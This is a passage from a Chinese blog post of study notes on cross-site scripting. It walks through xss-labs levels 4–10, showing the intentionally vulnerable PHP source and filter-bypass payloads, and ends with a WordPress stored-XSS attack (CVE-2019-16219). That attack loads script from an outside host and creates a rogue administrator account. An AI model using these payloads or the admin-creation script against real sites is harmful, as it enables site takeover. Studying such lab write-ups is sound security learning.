http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level5.php?keyword=find a way out!&quot;</span>; <br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level4&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level4&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;keyword&quot;</span>];<br><span class="hljs-variable">$str2</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;&gt;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str</span>);   <span class="hljs-comment">//将输入的&gt;替换为空</span><br><span class="hljs-variable">$str3</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;&lt;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str2</span>);  <span class="hljs-comment">//将输入的&lt;替换为空</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="hljs-string">&#x27;&lt;center&gt;</span><br><span class="hljs-string">&lt;form action=level4.php method=GET&gt;</span><br><span class="hljs-string">&lt;input name=keyword  value=&quot;&#x27;</span>.<span class="hljs-variable">$str3</span>.<span class="hljs-string">&#x27;&quot;&gt;</span><br><span class="hljs-string">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="hljs-string">&lt;/form&gt;</span><br><span class="hljs-string">&lt;/center&gt;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level4.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str3</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level5"><a href="#Level5" class="headerlink" title="Level5"></a>Level5</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs PHP">继续按上一关的Payload尝试<br><span class="hljs-string">&#x27; οnclick=alert() &#x27;</span>  <br><br>查看源码可以发现：on被替换成了o_n;&lt;script被替换成了&lt;scr_ipt<br>同时对输入的所有字母，都转化为小写<br>过滤了js的标签还有onfocus事件，虽然str_replace不区分大小写<br>但是有小写字母转化函数，所以就不能用大小写法来绕过过滤了，只能新找一个方法进行xss注入，<br>这里我们用a href标签法<br><br><span class="hljs-string">&quot;&gt; &lt;a href=javascript:alert()&gt;xss&lt;/a&gt; &lt;&quot;</span><br>输入后点击xss，触发a标签href属性即可<br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs PHP">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level6.php?keyword=break it out!&quot;</span>; <br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level5&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level5&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> = <span class="hljs-title function_ invoke__">strtolower</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;keyword&quot;</span>]);  <span class="hljs-comment">//把所有字符转换为小写</span><br><span class="hljs-variable">$str2</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;&lt;script&quot;</span>,<span class="hljs-string">&quot;&lt;scr_ipt&quot;</span>,<span class="hljs-variable">$str</span>); <span class="hljs-comment">//&lt;script被替换成了&lt;scr_ipt</span><br><span class="hljs-variable">$str3</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;on&quot;</span>,<span class="hljs-string">&quot;o_n&quot;</span>,<span class="hljs-variable">$str2</span>);  <span class="hljs-comment">//on被替换成了o_n</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="hljs-string">&#x27;&lt;center&gt;</span><br><span class="hljs-string">&lt;form action=level5.php method=GET&gt;</span><br><span class="hljs-string">&lt;input name=keyword  value=&quot;&#x27;</span>.<span class="hljs-variable">$str3</span>.<span class="hljs-string">&#x27;&quot;&gt;</span><br><span class="hljs-string">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="hljs-string">&lt;/form&gt;</span><br><span class="hljs-string">&lt;/center&gt;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level5.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str3</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level6"><a href="#Level6" class="headerlink" title="Level6"></a>Level6</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试输入相关的关键词，看看这题过滤了哪些内容<br>onfocus &lt;script&gt; &lt;a href=javascript:<span class="hljs-title function_ invoke__">alert</span>()&gt;<br><br>发现on &lt;script&gt; href 都被过滤了<br>尝试看看能不能大小写绕过<br>OnFocus &lt;sCriPt&gt; &lt;a hReF=javascript:<span class="hljs-title function_ invoke__">alert</span>()&gt;<br>发现不存在大小写的过滤<br><br>Payload：<br><span class="hljs-string">&quot;&gt; &lt;sCript&gt;alert()&lt;/sCript&gt; &lt;&quot;</span><br><span class="hljs-string">&quot; OnClick=javascript:alert() &quot;</span><br><span class="hljs-string">&quot;&gt; &lt;a hRef=javascript:alert()&gt;xss&lt;/a&gt; &lt;&quot;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs PHP">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level7.php?keyword=move up!&quot;</span>; <br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level6&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level6&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;keyword&quot;</span>];<br><span class="hljs-variable">$str2</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;&lt;script&quot;</span>,<span class="hljs-string">&quot;&lt;scr_ipt&quot;</span>,<span class="hljs-variable">$str</span>);<br><span class="hljs-variable">$str3</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;on&quot;</span>,<span class="hljs-string">&quot;o_n&quot;</span>,<span class="hljs-variable">$str2</span>);<br><span class="hljs-variable">$str4</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;src&quot;</span>,<span class="hljs-string">&quot;sr_c&quot;</span>,<span class="hljs-variable">$str3</span>);<br><span class="hljs-variable">$str5</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;data&quot;</span>,<span class="hljs-string">&quot;da_ta&quot;</span>,<span class="hljs-variable">$str4</span>);<br><span class="hljs-variable">$str6</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;href&quot;</span>,<span class="hljs-string">&quot;hr_ef&quot;</span>,<span class="hljs-variable">$str5</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="hljs-string">&#x27;&lt;center&gt;</span><br><span class="hljs-string">&lt;form action=level6.php method=GET&gt;</span><br><span class="hljs-string">&lt;input name=keyword  value=&quot;&#x27;</span>.<span class="hljs-variable">$str6</span>.<span class="hljs-string">&#x27;&quot;&gt;</span><br><span class="hljs-string">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="hljs-string">&lt;/form&gt;</span><br><span class="hljs-string">&lt;/center&gt;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level6.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str6</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level7"><a href="#Level7" class="headerlink" title="Level7"></a>Level7</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试输入相关的关键词，看看这题过滤了哪些内容<br>onfocus &lt;script&gt; &lt;a href=javascript:<span class="hljs-title function_ invoke__">alert</span>()&gt;<br><br>里面进行了小写转化，将检测出来的on，script，href给置换为空了<br>这里可以采用双写来进行绕过<br>比如on，我们可以写成oonn，当中间on被删掉的时候，就变成了on<br>比如script，可以写成scscriptipt，当script被删掉的时候，就变成了script<br><br>Payload：<br><span class="hljs-string">&quot;&gt; &lt;sCrsCriptipt&gt;alert()&lt;/sCrsCriptipt&gt; &lt;&quot;</span><br><span class="hljs-string">&quot; OOnnClick=alert() &quot;</span><br><span class="hljs-string">&quot;&gt; &lt;a hRhRefef=javascrscriptipt:alert()&gt;xss&lt;/a&gt; &lt;&quot;</span><br><br><span class="hljs-string">&quot;&gt; &lt;img srsrcc=&quot;</span>x<span class="hljs-string">&quot; oonnerror=alert(1)&gt; &lt;&quot;</span><br>onerror属性是指当图片加载不出来的时候触发js函数，以上面的代码为例，<br>这里因为src指向的是值x，而不是图片的地址和base64编码啥的，就会导致触发alert函数<br>当鼠标移出图片的时候执行的属性onmouseout<br>当鼠标移动到图片的时候执行的属性onmouseover<br><br>此外，这里还禁用了data，data禁用的原因是：<br>这里利用iframe标签，插入一个标签data:text/html;base64, <br>将后面的内容进行base64编码：PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+<br>进行base64解码后是&lt;script&gt;<span class="hljs-title function_ invoke__">alert</span>()&lt;/script&gt;<br>Payload：<br><span class="hljs-string">&quot;&gt; &lt;iframe srsrcc=&quot;</span>dadatata:text/html;base64,PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+<span class="hljs-string">&quot;&gt; &lt;&quot;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs PHP">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level8.php?keyword=nice try!&quot;</span>; <br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level7&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level7&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> =<span class="hljs-title function_ invoke__">strtolower</span>( <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;keyword&quot;</span>]);<br><span class="hljs-variable">$str2</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;script&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str</span>);<br><span class="hljs-variable">$str3</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;on&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str2</span>);<br><span class="hljs-variable">$str4</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;src&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str3</span>);<br><span class="hljs-variable">$str5</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;data&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str4</span>);<br><span class="hljs-variable">$str6</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;href&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$str5</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="hljs-string">&#x27;&lt;center&gt;</span><br><span class="hljs-string">&lt;form action=level7.php method=GET&gt;</span><br><span class="hljs-string">&lt;input name=keyword  value=&quot;&#x27;</span>.<span class="hljs-variable">$str6</span>.<span class="hljs-string">&#x27;&quot;&gt;</span><br><span class="hljs-string">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="hljs-string">&lt;/form&gt;</span><br><span class="hljs-string">&lt;/center&gt;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level7.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str6</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level8"><a href="#Level8" class="headerlink" title="Level8"></a>Level8</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试输入相关的关键词，看看这题过滤了哪些内容<br><span class="hljs-string">&quot; sRc DaTa OnFocus &lt;sCriPt&gt; &lt;a hReF=javascript:alert()&gt;</span><br><span class="hljs-string">可知，添加了小写转化函数，还有过滤掉了src、data、onfocus、href、script、&quot;</span>（双引号）<br><br>但在这里我们可以利用href的隐藏属性自动Unicode解码，我们可以插入一段js伪协议<br>将此进行Unicode编码<br>javascript:<span class="hljs-title function_ invoke__">alert</span>()<br>得到<br>Payload：<br>&amp;<span class="hljs-comment">#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#41;</span><br></code></pre></td></tr></table></figure>

<h3 id="Level9"><a href="#Level9" class="headerlink" title="Level9"></a>Level9</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试输入相关的关键词，看看这题过滤了哪些内容<br><span class="hljs-string">&quot; sRc DaTa OnFocus &lt;sCriPt&gt; &lt;a hReF=javascript:alert()&gt; &amp;#106;</span><br><span class="hljs-string">当传入的值没有http://</span><br><span class="hljs-string">就会执行if，输出不合法</span><br><span class="hljs-string">所以我们需要向传入的值里面添加http://并用注释符注释掉否则会执行不了无法弹窗</span><br><span class="hljs-string">让函数strpos返回一个数字，构造payload</span><br><span class="hljs-string"></span><br><span class="hljs-string">Payload：</span><br><span class="hljs-string">&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#41;/* http:// */</span><br></code></pre></td></tr></table></figure>

<h3 id="Level10"><a href="#Level10" class="headerlink" title="Level10"></a>Level10</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试输入相关的关键词，看看这题过滤了哪些内容<br><span class="hljs-string">&quot; sRc DaTa OnFocus &lt;sCriPt&gt; &lt;a hReF=javascript:alert()&gt; &amp;#106;</span><br><span class="hljs-string">查看源码可以发现，传入的参数都被实体化了</span><br><span class="hljs-string">查看源码发现原来还有其他隐藏的传参方法</span><br><span class="hljs-string">这里是get传参t_sort，并过滤掉了&lt;&gt;号，不能闭合插入标签</span><br><span class="hljs-string">但是我们还能用onclick事件，因为这里输入框被隐藏了，需要添加type=&quot;</span>text<span class="hljs-string">&quot;，构造payload</span><br><span class="hljs-string"></span><br><span class="hljs-string">Payload：</span><br><span class="hljs-string">?t_sort=&quot;</span> onclick=javascript:<span class="hljs-title function_ invoke__">alert</span>() type=<span class="hljs-string">&quot;text</span><br></code></pre></td></tr></table></figure>

<h2 id="XSS实战"><a href="#XSS实战" class="headerlink" title="XSS实战"></a>XSS实战</h2><p><strong>CVE-2019-16219 WordPress5.0存储型XSS漏洞</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs JavaScript">测试<span class="hljs-title class_">Payload</span><br><span class="hljs-string">&quot;&gt;&lt;img src=1 onerror=alert(&quot;</span>xss<span class="hljs-string">&quot;)&gt;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs JavaScript">攻击<span class="hljs-title class_">Payload</span><br><span class="hljs-string">&quot;&gt;&lt;img src=1 onerror=&quot;</span><span class="hljs-attr">javascript</span>:(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) &#123; <span class="hljs-keyword">var</span> url = <span class="hljs-string">&#x27;http://aaa.bbb.ccc.ddd/wpaddadmin.js&#x27;</span>;<span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span> beef == <span class="hljs-string">&#x27;undefined&#x27;</span>) &#123; <span class="hljs-keyword">var</span> bf = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">createElement</span>(<span class="hljs-string">&#x27;script&#x27;</span>); bf.<span class="hljs-property">type</span> = <span class="hljs-string">&#x27;text/javascript&#x27;</span>; bf.<span class="hljs-property">src</span> = url; <span class="hljs-variable language_">document</span>.<span class="hljs-property">body</span>.<span class="hljs-title function_">appendChild</span>(bf);&#125;&#125;)();<span class="hljs-string">&quot;&gt;</span><br><span class="hljs-string"></span><br><span class="hljs-string">恶意js</span><br><span class="hljs-string">// Send a GET request to the URL &#x27;/wp-admin/user-new.php&#x27;, and extract the current &#x27;nonce&#x27; value</span><br><span class="hljs-string">var ajaxRequest = new XMLHttpRequest();</span><br><span class="hljs-string">var requestURL = &quot;</span>/wp-admin/user-<span class="hljs-keyword">new</span>.<span class="hljs-property">php</span><span class="hljs-string">&quot;;</span><br><span class="hljs-string">var nonceRegex = /ser&quot;</span> value=<span class="hljs-string">&quot;([^&quot;</span>]*?)<span class="hljs-string">&quot;/g;</span><br><span class="hljs-string">ajaxRequest.open(&quot;</span><span class="hljs-variable constant_">GET</span><span class="hljs-string">&quot;, requestURL, false);</span><br><span class="hljs-string">ajaxRequest.send();</span><br><span class="hljs-string">var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);</span><br><span class="hljs-string">var nonce = nonceMatch[1];</span><br><span class="hljs-string"></span><br><span class="hljs-string">// Construct a POST query, using the previously extracted &#x27;nonce&#x27; value, and create a new user with an arbitrary username / password, as an Administrator</span><br><span class="hljs-string">var params = &quot;</span>action=createuser&amp;_wpnonce_create-user=<span class="hljs-string">&quot;+nonce+&quot;</span>&amp;user_login=attacker&amp;email=attacker@site.<span class="hljs-property">com</span>&amp;pass1=attacker&amp;pass2=attacker&amp;role=administrator<span class="hljs-string">&quot;;</span><br><span class="hljs-string">ajaxRequest = new XMLHttpRequest();</span><br><span class="hljs-string">ajaxRequest.open(&quot;</span><span class="hljs-variable constant_">POST</span><span class="hljs-string">&quot;, requestURL, true);</span><br><span class="hljs-string">ajaxRequest.setRequestHeader(&quot;</span><span class="hljs-title class_">Content</span>-<span class="hljs-title class_">Type</span><span class="hljs-string">&quot;, &quot;</span>application/x-www-form-urlencoded<span class="hljs-string">&quot;);</span><br><span class="hljs-string">ajaxRequest.send(params);</span><br></code></pre></td></tr></table></figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" class="category-chain-item">学习笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/XSS/" class="print-no-link">#XSS</a>
      
        <a href="/tags/XSSlabs/" class="print-no-link">#XSSlabs</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>XSS漏洞学习笔记</div>
      <div>http://example.com/2022/06/27/xss/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>ZERO</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年6月27日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/07/19/misc/" title="浅谈CTF-Misc">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">浅谈CTF-Misc</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
